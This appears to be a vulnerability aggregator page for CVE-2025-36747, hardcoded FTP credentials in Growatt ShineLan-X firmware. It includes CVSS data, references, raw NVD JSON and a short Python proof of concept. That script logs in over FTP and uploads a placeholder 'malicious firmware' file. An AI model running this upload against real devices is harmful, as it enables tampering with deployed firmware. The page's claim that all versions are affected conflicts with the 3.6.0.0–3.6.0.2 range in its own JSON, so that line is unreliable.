CVE-2025-36747

Description

ShineLan-X contains a set of credentials for an FTP server was found within the firmware, allowing testers to establish an insecure FTP connection with the server. This may allow an attacker to replace legitimate files being deployed to devices with their own malicious versions, since the firmware signature verification is not enforced.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:* - NOT VULNERABLE

ShineLan-X固件（所有版本均受影响）

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2025-36747 PoC - ShineLan-X FTP Credential Disclosure
Note: This PoC is for educational and authorized testing purposes only.
"""
import ftplib
import sys

def exploit_ftp(target_ip, username, password):
    """
    Establish FTP connection and attempt to upload malicious file
    """
    try:
        print(f"[*] Connecting to FTP server at {target_ip}...")
        ftp = ftplib.FTP(target_ip)
        ftp.login(user=username, passwd=password)
        print(f"[+] Login successful!")
        print(f"[*] FTP banner: {ftp.getwelcome()}")
        
        # List files on FTP server
        print("[*] Listing files:")
        files = ftp.nlst()
        for f in files:
            print(f"  - {f}")
        
        # Attempt to upload malicious firmware file
        malicious_content = b"MALICIOUS_FIRMWARE_PAYLOAD"
        try:
            ftp.storbinary('STOR malicious_firmware.bin', malicious_content)
            print("[+] Malicious file uploaded successfully!")
        except:
            print("[-] Upload failed or not permitted")
        
        ftp.quit()
        return True
    except ftplib.all_errors as e:
        print(f"[-] FTP error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 4:
        print(f"Usage: {sys.argv[0]} <target_ip> <username> <password>")
        sys.exit(1)
    
    target = sys.argv[1]
    user = sys.argv[2]
    passwd = sys.argv[3]
    exploit_ftp(target, user, passwd)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-36747
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-36747
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-36747/
[4] VulDB https://vuldb.com/cve/CVE-2025-36747
[5] https://csirt.divd.nl/CVE-2025-36747/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-36747", "sourceIdentifier": "[email protected]", "published": "2025-12-13T16:16:53.710", "lastModified": "2026-01-14T18:05:23.253", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ShineLan-X contains a set of credentials for an FTP server was found within the firmware, allowing testers to establish an insecure FTP connection with the server. This may allow an attacker to replace legitimate files being deployed to devices with their own malicious versions, since the firmware signature verification is not enforced."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.4, "baseSeverity": "CRITICAL", "attackVector": "ADJACENT", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-798"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:growatt:shine_lan-x_firmware:*:*:*:*:*:*:*:*", "versionStartIncluding": "3.6.0.0", "versionEndExcluding": "3.6.0.2", "matchCriteriaId": "1176EDB4-C08F-4592-8C16-321A8A0539C4"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:growatt:shine_lan-x:-:*:*:*:*:*:*:*", "matchCriteriaId": "DD537AAA-F836-496A-BC05-6CAED38FB271"}]}]}], "references": [{"url": "https://csirt.divd.nl/CVE-2025-36747/", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}